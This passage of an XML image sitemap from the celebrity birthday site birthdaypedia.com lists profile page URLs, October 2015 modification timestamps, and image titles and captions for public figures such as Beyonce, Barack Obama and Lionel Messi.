<loc>https://birthdaypedia.com/pink/</loc>\n <lastmod>2015-10-09T16:52:29+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Pink.jpg</image:loc>\n <image:title><![CDATA[Pink]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/michael-emerson/</loc>\n <lastmod>2015-10-09T16:55:52+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Michael-Emerson.jpg</image:loc>\n <image:title><![CDATA[Michael Emerson]]></image:title>\n <image:caption><![CDATA[Michael Emerson]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/beyonce-knowles/</loc>\n <lastmod>2015-10-09T16:56:19+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Beyonce.jpg</image:loc>\n <image:title><![CDATA[Beyonce]]></image:title>\n <image:caption><![CDATA[Beyonce]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/charlie-sheen/</loc>\n <lastmod>2015-10-09T17:07:10+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Charlie-Sheen.jpg</image:loc>\n <image:title><![CDATA[Charlie Sheen]]></image:title>\n <image:caption><![CDATA[Charlie Sheen]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/keanu-reeves/</loc>\n <lastmod>2015-10-09T17:07:27+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Keanu-Reeves.jpg</image:loc>\n <image:title><![CDATA[Keanu Reeves]]></image:title>\n <image:caption><![CDATA[Keanu-Reeves]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/jessica-nigri/</loc>\n <lastmod>2015-10-09T18:23:06+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Jessica-Nigri.jpg</image:loc>\n <image:title><![CDATA[Jessica Nigri]]></image:title>\n <image:caption><![CDATA[Jessica Nigri]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/barack-obama/</loc>\n <lastmod>2015-10-09T18:24:32+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Barack-Obama.jpg</image:loc>\n <image:title><![CDATA[Barack Obama]]></image:title>\n <image:caption><![CDATA[Barack Obama]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/evangeline-lilly/</loc>\n <lastmod>2015-10-09T18:38:03+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Nicole-Evangeline-Lilly.jpg</image:loc>\n <image:title><![CDATA[Nicole Evangeline Lilly]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/mark-cuban/</loc>\n <lastmod>2015-10-09T18:38:44+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Mark-Cuban.jpg</image:loc>\n <image:title><![CDATA[Mark Cuban]]></image:title>\n <image:caption><![CDATA[Mark Cuban]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/arnold-schwarzenegger/</loc>\n <lastmod>2015-10-09T18:41:57+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Arnold-Schwarzenegger.jpg</image:loc>\n <image:title><![CDATA[Arnold Schwarzenegger]]></image:title>\n <image:caption><![CDATA[Arnold Schwarzenegger]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/martina-mcbride/</loc>\n <lastmod>2015-10-09T19:11:54+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Martina-McBride.jpg</image:loc>\n <image:title><![CDATA[Martina McBride]]></image:title>\n <image:caption><![CDATA[Martina McBride]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/manu-ginobili/</loc>\n <lastmod>2015-10-09T19:12:20+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Manu-Ginobili.jpg</image:loc>\n <image:title><![CDATA[Manu Ginobili]]></image:title>\n <image:caption><![CDATA[Manu Ginobili]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/dolph-ziggler/</loc>\n <lastmod>2015-10-09T19:14:28+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Dolph-Ziggler.jpg</image:loc>\n <image:title><![CDATA[Dolph Ziggler]]></image:title>\n <image:caption><![CDATA[Dolph Ziggler]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/jennifer-lopez/</loc>\n <lastmod>2015-10-09T19:21:27+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Jennifer-Lopez.jpg</image:loc>\n <image:title><![CDATA[Jennifer Lopez]]></image:title>\n <image:caption><![CDATA[Jennifer Lopez]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/daniel-radcliffe/</loc>\n <lastmod>2015-10-09T19:21:43+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Daniel-Radcliffe.jpg</image:loc>\n <image:title><![CDATA[Daniel Radcliffe]]></image:title>\n <image:caption><![CDATA[Daniel Radcliffe]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/sabrina-carpenter/</loc>\n <lastmod>2015-10-13T19:52:36+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/05/Sabrina-Carpenter.jpg</image:loc>\n <image:title><![CDATA[Sabrina Carpenter]]></image:title>\n <image:caption><![CDATA[Sabrina Carpenter]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/jack-nicholson/</loc>\n <lastmod>2015-10-13T19:53:37+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/04/Jack-Nicholson.jpg</image:loc>\n <image:title><![CDATA[Jack Nicholson]]></image:title>\n <image:caption><![CDATA[Jack Nicholson]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/marisa-miller/</loc>\n <lastmod>2015-10-14T14:10:25+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Marisa-Miller-.jpg</image:loc>\n <image:title><![CDATA[Marisa Miller ]]></image:title>\n <image:caption><![CDATA[Marisa Miller ]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/charlize-theron/</loc>\n <lastmod>2015-10-14T14:11:42+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Charlize-Theron.jpg</image:loc>\n <image:title><![CDATA[Charlize Theron]]></image:title>\n <image:caption><![CDATA[Charlize Theron]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/alyson-stoner/</loc>\n <lastmod>2015-10-14T14:12:52+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Alyson-Stoner.jpg</image:loc>\n <image:title><![CDATA[Alyson Stoner]]></image:title>\n <image:caption><![CDATA[Alyson Stoner]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/cara-delevingne/</loc>\n <lastmod>2015-10-14T14:13:21+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Cara-Delevingne.jpg</image:loc>\n <image:title><![CDATA[Cara Delevingne]]></image:title>\n <image:caption><![CDATA[Cara Delevingne]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/alfred-hitchcock/</loc>\n <lastmod>2015-10-14T14:14:03+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Alfred-Hitchcock.jpg</image:loc>\n <image:title><![CDATA[Alfred Hitchcock]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/bernie-mac-birthday/</loc>\n <lastmod>2015-10-14T14:16:03+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Bernie-Mac.jpg</image:loc>\n <image:title><![CDATA[Bernie Mac]]></image:title>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Bernie_Mac.jpg</image:loc>\n <image:title><![CDATA[Bernie Mac]]></image:title>\n <image:caption><![CDATA[Bernie Mac]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tim-hardaway/</loc>\n <lastmod>2015-10-14T14:22:43+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Tim.jpg</image:loc>\n <image:title><![CDATA[Tim Hardaway]]></image:title>\n <image:caption><![CDATA[Tim Hardaway]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/debbie-gibson/</loc>\n <lastmod>2015-10-14T14:23:32+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Debbie-Gibson.jpg</image:loc>\n <image:title><![CDATA[Debbie Gibson]]></image:title>\n <image:caption><![CDATA[Debbie Gibson]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/aaron-paul/</loc>\n <lastmod>2015-10-14T14:23:54+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Aaron-Paul.jpg</image:loc>\n <image:title><![CDATA[Aaron Paul]]></image:title>\n <image:caption><![CDATA[Aaron Paul]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/jack-black/</loc>\n <lastmod>2015-10-14T14:26:25+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/jack-black.jpg</image:loc>\n <image:title><![CDATA[jack black]]></image:title>\n <image:caption><![CDATA[Jack Black]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/melissa-mccarthy/</loc>\n <lastmod>2015-10-14T14:26:47+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Melissa-McCarthy.jpg</image:loc>\n <image:title><![CDATA[Melissa McCarthy]]></image:title>\n <image:caption><![CDATA[Melissa McCarthy]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tim-burton/</loc>\n <lastmod>2015-10-14T14:30:10+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Tim-Burton.jpg</image:loc>\n <image:title><![CDATA[Tim Burton]]></image:title>\n <image:caption><![CDATA[Tim Burton]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/john-cena/</loc>\n <lastmod>2015-10-14T14:32:22+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/04/John-Cena-American-Wrestling.jpg</image:loc>\n <image:title><![CDATA[John Cena - American Wrestling]]></image:title>\n <image:caption><![CDATA[John Cena - American Wrestling]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/kelly-clarkson/</loc>\n <lastmod>2015-10-14T14:32:59+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/04/Kelly-Clarkson.jpg</image:loc>\n <image:title><![CDATA[Kelly Clarkson]]></image:title>\n <image:caption><![CDATA[Kelly Clarkson]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/casey-kasem-renowned-radio-host/</loc>\n <lastmod>2015-10-14T14:33:38+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/04/Casey-Kasem-Renowned-Radio-Host.jpg</image:loc>\n <image:title><![CDATA[Casey Kasem - Renowned Radio Host]]></image:title>\n <image:caption><![CDATA[Casey Kasem - Renowned Radio Host]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/jay-leno-acclaimed-tv-host/</loc>\n <lastmod>2015-10-14T14:34:01+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/04/Jay-Leno.jpg</image:loc>\n <image:title><![CDATA[Jay Leno]]></image:title>\n <image:caption><![CDATA[Jay Leno]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/jerry-seinfeld-greatest-stand-up-comedian/</loc>\n <lastmod>2015-10-14T14:34:29+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/04/Jerry-Seinfeld.jpg</image:loc>\n <image:title><![CDATA[Jerry Seinfeld]]></image:title>\n <image:caption><![CDATA[Jerry Seinfeld]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/dianna-argon-actress/</loc>\n <lastmod>2015-10-14T14:34:48+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/04/Dianna-Argon.jpg</image:loc>\n <image:title><![CDATA[Dianna Argon]]></image:title>\n <image:caption><![CDATA[Dianna Argon]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/country-legend-tim-mcgraw/</loc>\n <lastmod>2015-10-14T14:36:15+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Country-Legend-Tim-McGraw.jpg</image:loc>\n <image:title><![CDATA[Country Legend Tim McGraw]]></image:title>\n <image:caption><![CDATA[Country Legend Tim McGraw]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/dwayne-the-rock-johnson/</loc>\n <lastmod>2015-10-14T14:57:29+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Dwayne-The-Rock-Johnson.jpg</image:loc>\n <image:title><![CDATA[Dwayne The Rock Johnson]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/country-singer-randy-travist/</loc>\n <lastmod>2015-10-14T14:57:55+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Country-Singer-Randy-Travist.jpg</image:loc>\n <image:title><![CDATA[Country Singer Randy Travist]]></image:title>\n <image:caption><![CDATA[Country Singer Randy Travist]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/pop-singer-chris-brown/</loc>\n <lastmod>2015-10-14T14:58:49+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Pop-Singer-Chris-Brown.jpg</image:loc>\n <image:title><![CDATA[Pop Singer Chris Brown]]></image:title>\n <image:caption><![CDATA[Pop Singer Chris Brown]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/george-clooney/</loc>\n <lastmod>2015-10-14T14:59:08+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/George-Clooney.jpg</image:loc>\n <image:title><![CDATA[George Clooney]]></image:title>\n <image:caption><![CDATA[George Clooney]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/john-constantine-unitas/</loc>\n <lastmod>2015-10-14T15:48:14+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/John-Constantine-Unitas.jpg</image:loc>\n <image:title><![CDATA[John Constantine Unitas]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/enrique-iglesias/</loc>\n <lastmod>2015-10-14T15:50:31+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Enrique-Iglesias.jpg</image:loc>\n <image:title><![CDATA[Enrique Iglesias]]></image:title>\n <image:caption><![CDATA[Enrique Iglesias]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tony-hawk/</loc>\n <lastmod>2015-10-14T15:51:03+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/05/Tony-Hawk.jpg</image:loc>\n <image:title><![CDATA[Tony Hawk]]></image:title>\n <image:caption><![CDATA[Tony Hawk]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/robert-pattinson/</loc>\n <lastmod>2015-10-14T15:51:22+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/05/Robert-Pattinson.jpg</image:loc>\n <image:title><![CDATA[Robert Pattinson]]></image:title>\n <image:caption><![CDATA[Robert Pattinson]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/miranda-cosgrove/</loc>\n <lastmod>2015-10-14T15:54:22+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/05/Miranda-Cosgrove.jpg</image:loc>\n <image:title><![CDATA[Miranda Cosgrove]]></image:title>\n <image:caption><![CDATA[Miranda Cosgrove]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/ray-lewis/</loc>\n <lastmod>2015-10-14T15:56:26+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/05/Ray-Lewis.jpg</image:loc>\n <image:title><![CDATA[Ray Lewis]]></image:title>\n <image:caption><![CDATA[Ray Lewis]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/andrea-pirlo/</loc>\n <lastmod>2015-10-14T16:22:08+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/05/Andrea-Pirlo.jpg</image:loc>\n <image:title><![CDATA[Andrea Pirlo]]></image:title>\n <image:caption><![CDATA[Andrea Pirlo]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/cher/</loc>\n <lastmod>2015-10-14T16:22:29+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/05/Cher.jpg</image:loc>\n <image:title><![CDATA[Cher]]></image:title>\n <image:caption><![CDATA[Cher]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/mr-t/</loc>\n <lastmod>2015-10-14T16:22:58+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/05/Mr.-T.jpg</image:loc>\n <image:title><![CDATA[Mr. T]]></image:title>\n <image:caption><![CDATA[Mr. T]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/santana-garrett/</loc>\n <lastmod>2015-10-14T16:23:36+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/05/Santana-Garrett.jpg</image:loc>\n <image:title><![CDATA[Santana Garrett]]></image:title>\n <image:caption><![CDATA[Santana Garrett]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/ian-mckellen/</loc>\n <lastmod>2015-10-14T16:23:53+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/05/Ian-McKellen.jpg</image:loc>\n <image:title><![CDATA[Ian McKellen]]></image:title>\n <image:caption><![CDATA[Ian McKellen]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/lenny-kravitz/</loc>\n <lastmod>2015-10-14T16:25:14+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/05/Lenny-Kravitz.jpg</image:loc>\n <image:title><![CDATA[Lenny Kravitz]]></image:title>\n <image:caption><![CDATA[Lenny Kravitz]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/jep-robertson/</loc>\n <lastmod>2015-10-14T16:26:25+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/05/Jep-Robertson.jpg</image:loc>\n <image:title><![CDATA[Jep Robertson]]></image:title>\n <image:caption><![CDATA[Jep Robertson]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/george-strait/</loc>\n <lastmod>2015-10-14T16:28:01+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/05/George-Strait.jpg</image:loc>\n <image:title><![CDATA[George Strait]]></image:title>\n <image:caption><![CDATA[George Strait]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/la-toya-jackson/</loc>\n <lastmod>2015-10-14T16:28:24+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/05/La-Toya-Jackson.jpg</image:loc>\n <image:title><![CDATA[La Toya Jackson]]></image:title>\n <image:caption><![CDATA[La Toya Jackson]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/morgan-freeman/</loc>\n <lastmod>2015-10-14T16:28:49+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Morgan-Freeman.jpg</image:loc>\n <image:title><![CDATA[Morgan Freeman]]></image:title>\n <image:caption><![CDATA[Morgan Freeman]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/zachary-quinto/</loc>\n <lastmod>2015-10-14T16:30:12+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/%EF%BB%BF%EF%BB%BFZachary-Quinto.jpg</image:loc>\n <image:title><![CDATA[Zachary Quinto]]></image:title>\n <image:caption><![CDATA[Zachary Quinto]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/anderson-cooper/</loc>\n <lastmod>2015-10-14T16:32:18+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Anderson-Cooper.jpg</image:loc>\n <image:title><![CDATA[Anderson Cooper]]></image:title>\n <image:caption><![CDATA[Anderson Cooper]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/angelina-jolie/</loc>\n <lastmod>2015-10-14T17:09:23+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Angelina-Jolie.jpg</image:loc>\n <image:title><![CDATA[Angelina Jolie]]></image:title>\n <image:caption><![CDATA[Angelina Jolie]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/robert-englund/</loc>\n <lastmod>2015-10-14T17:10:16+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Robert-Englund.jpg</image:loc>\n <image:title><![CDATA[Robert Englund]]></image:title>\n <image:caption><![CDATA[Robert Englund]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/kanye-west/</loc>\n <lastmod>2015-10-14T17:27:49+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Kanye-West.jpg</image:loc>\n <image:title><![CDATA[Kanye West]]></image:title>\n <image:caption><![CDATA[Kanye West]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/johnny-depp/</loc>\n <lastmod>2015-10-14T17:33:23+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Johnny-Depp.jpg</image:loc>\n <image:title><![CDATA[Johnny Depp]]></image:title>\n <image:caption><![CDATA[Johnny Depp]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/kate-upton/</loc>\n <lastmod>2015-10-14T17:33:40+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Kate-Upton.jpg</image:loc>\n <image:title><![CDATA[Kate Upton]]></image:title>\n <image:caption><![CDATA[Kate Upton]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/hugh-laurie/</loc>\n <lastmod>2015-10-14T17:33:56+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Hugh-Laurie.jpg</image:loc>\n <image:title><![CDATA[Hugh Laurie]]></image:title>\n <image:caption><![CDATA[Hugh Laurie]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/jim-nabors/</loc>\n <lastmod>2015-10-14T17:46:52+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Jim-Nabors.jpg</image:loc>\n <image:title><![CDATA[Jim Nabors]]></image:title>\n <image:caption><![CDATA[Jim Nabors]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/courteney-cox/</loc>\n <lastmod>2015-10-14T17:51:10+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Courteney-Cox.jpg</image:loc>\n <image:title><![CDATA[Courteney Cox]]></image:title>\n <image:caption><![CDATA[Courteney Cox]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tupac-shakur/</loc>\n <lastmod>2015-10-14T17:56:47+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Tupac-Shakur.jpg</image:loc>\n <image:title><![CDATA[Tupac Shakur]]></image:title>\n <image:caption><![CDATA[Tupac Shakur]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/barry-manilow/</loc>\n <lastmod>2015-10-14T17:57:10+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Barry-Manilow.jpg</image:loc>\n <image:title><![CDATA[Barry Manilow]]></image:title>\n <image:caption><![CDATA[Barry Manilow]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/paul-mccartney/</loc>\n <lastmod>2015-10-14T17:57:33+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Paul-McCartney.jpg</image:loc>\n <image:title><![CDATA[Paul McCartney]]></image:title>\n <image:caption><![CDATA[Paul McCartney]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/paula-abdul/</loc>\n <lastmod>2015-10-14T18:01:49+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Paula-Abdul.jpg</image:loc>\n <image:title><![CDATA[Paula Abdul]]></image:title>\n <image:caption><![CDATA[Paula Abdul]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/meryl-streep/</loc>\n <lastmod>2015-10-14T18:03:26+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Meryl-Streep.jpg</image:loc>\n <image:title><![CDATA[Meryl Streep]]></image:title>\n <image:caption><![CDATA[Meryl Streep]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/lionel-messi/</loc>\n <lastmod>2015-10-14T18:13:19+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Lionel-Messi.jpg</image:loc>\n <image:title><![CDATA[Lionel Messi]]></image:title>\n <image:caption><![CDATA[Lionel Messi]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/ricky-gervais-tv-actor/</loc>\n <lastmod>2015-10-14T18:13:57+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Ricky-Gervais.jpg</image:loc>\n <image:title><![CDATA[Ricky Gervais]]></image:title>\n <image:caption><![CDATA[Ricky Gervais]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/ariana-grande-pop-singer/</loc>\n <lastmod>2015-10-14T18:18:33+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Ariana-Grande-%E2%80%93-Pop-Singer.jpg</image:loc>\n <image:title><![CDATA[Ariana Grande – Pop Singer]]></image:title>\n <image:caption><![CDATA[Ariana Grande – Pop Singer]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/gary-busey-actor/</loc>\n <lastmod>2015-10-14T18:19:18+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Gary-Busey.jpg</image:loc>\n <image:title><![CDATA[Gary Busey]]></image:title>\n <image:caption><![CDATA[Gary Busey]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/mike-tyson-boxer/</loc>\n <lastmod>2015-10-14T18:20:00+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Mike-Tyson.jpg</image:loc>\n <image:title><![CDATA[Mike Tyson]]></image:title>\n <image:caption><![CDATA[Mike Tyson]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/pamela-anderson/</loc>\n <lastmod>2015-10-14T18:20:46+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Pamela-Anderson.jpg</image:loc>\n <image:title><![CDATA[Pamela Anderson]]></image:title>\n <image:caption><![CDATA[Pamela 